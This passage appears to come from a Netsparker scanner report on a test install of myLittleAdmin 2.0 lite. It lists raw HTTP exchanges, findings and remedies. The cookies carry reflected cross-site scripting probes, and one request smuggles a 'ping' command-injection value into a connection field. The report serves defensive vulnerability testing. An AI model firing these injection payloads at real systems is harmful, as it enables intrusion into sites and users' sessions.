<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

Identification Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/pref/default.asp

/mla2000/scripts/pref/default.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/default.asp

Injection URL

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/default.asp?refresh=1

Injection Request

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/theme.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

Identification Request

GET /mla2000/scripts/pref/default.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/display.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>



<P>&nbsp;</P>
<H2>Please wait while the tree is loading...</H2>


<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";

//-->
</SCRIPT>

</BODY>
</HTML>

Identification Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>




<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M10');

//-->
</SCRIPT>

</BODY>
</HTML>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /mla2000/scripts/conn/dsnless.asp

/mla2000/scripts/conn/dsnless.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp

Form target action

dsnless.asp

Request

GET /mla2000/scripts/conn/dsnless.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:46:01 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:46:00 GMT
Content-Length: 1793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../conn/default.asp">Connection</A> \ <A HREF="../conn/dsnless.asp">DSN-less</A></P>

<FORM NAME="mla_conn" METHOD=POST ACTION="dsnless.asp">
<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form">
<TR><TD CLASS="caption" COLSPAN=4><IMG SRC="../../themes/classic/images/mylittletree/server.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALIGN="MIDDLE" ALT="Connection"> Connection</TD></TR>
<TR>
<TD CLASS="formlabel">Data Source :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_datasource" CLASS="alphanumeric" TITLE="Data Source"></TD>
<TD CLASS="formlabel">Port :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_portnumber" CLASS="numeric" TITLE="Port"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Initial Catalog :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_initialcatalog" CLASS="alphanumeric" TITLE="Initial Catalog"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Provider :</TD>
<TD COLSPAN=3>
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="SQLOLEDB" ID="mla_conn_provider_1" CHECKED><LABEL FOR="mla_conn_provider_1">SQLOLEDB</LABEL> &nbsp;
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="ODBC" ID="mla_conn_provider_2"><LABEL FOR="mla_conn_provider_2">ODBC</LABEL>
</TD>
</TR>
<TR>
<TD CLASS="formlabel">Network Library :</TD>
<TD>
<SELECT NAME="mla_conn_networklibrary">
<OPTION VALUE="">Default</OPTION>
<OPTION VALUE="dbnmpntw">Named Pipes</OPTION>
<OPTION VALUE="dbmssocn">Winsock TCP/IP</OPTION>
<OPTION VALUE="dbmsspxn">SPX/IPX</OPTION>
<OPTION VALUE="dbmsvinn">Banyan Vines</OPTION>
<OPTION VALUE="dbmsrpcn">Multi-Protocol (RPC)</OPTION>
</SELECT>
</TD>
<TD CLASS="formlabel">Trusted :</TD>
<TD><INPUT TYPE="checkbox" NAME="mla_conn_trusted"></TD>
</TR>
<TR>
<TD CLASS="formlabel">User Name :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_user" CLASS="alphanumeric" TITLE="User Name"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Password :</TD>
<TD COLSPAN=3><INPUT TYPE="password" NAME="mla_conn_password" CLASS="alphanumeric" TITLE="Password"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=3 CLASS="formlabel">Save this information into a cookie :</TD><TD><INPUT TYPE="checkbox" NAME="mla_conn_cookie"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=4 ALIGN=CENTER>
<INPUT TYPE="reset" VALUE="Reset" NAME="mla_conn_reset"> &nbsp;
<INPUT TYPE="submit" VALUE="Connect" NAME="mla_conn_submit">
</TD>
</TR>
</TABLE>
</FORM>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
document.mla_conn.mla_conn_datasource.value = "";
document.mla_conn.mla_conn_portnumber.value = "";
setRadioValue(document.mla_conn.mla_conn_provider, "", "");
setSelectValue(document.mla_conn.mla_conn_networklibrary, "", "");
document.mla_conn.mla_conn_initialcatalog.value = "";
document.mla_conn.mla_conn_trusted.checked = false;
document.mla_conn.mla_conn_user.value = "";
document.mla_conn.mla_conn_password.value = "";

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M1');
//-->
</SCRIPT>

</BODY>
</HTML>
[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

1 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Injection URL

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Injection Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=%3C%2Fa+style%3Dx%3Aexpre%2F%2A%2A%2Fssion%28netsparker%280x0003E5%29%29%3E&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

Identification Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=%22%26ping+%2Dc+26+127%2E0%2E0%2E1+%26%22&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
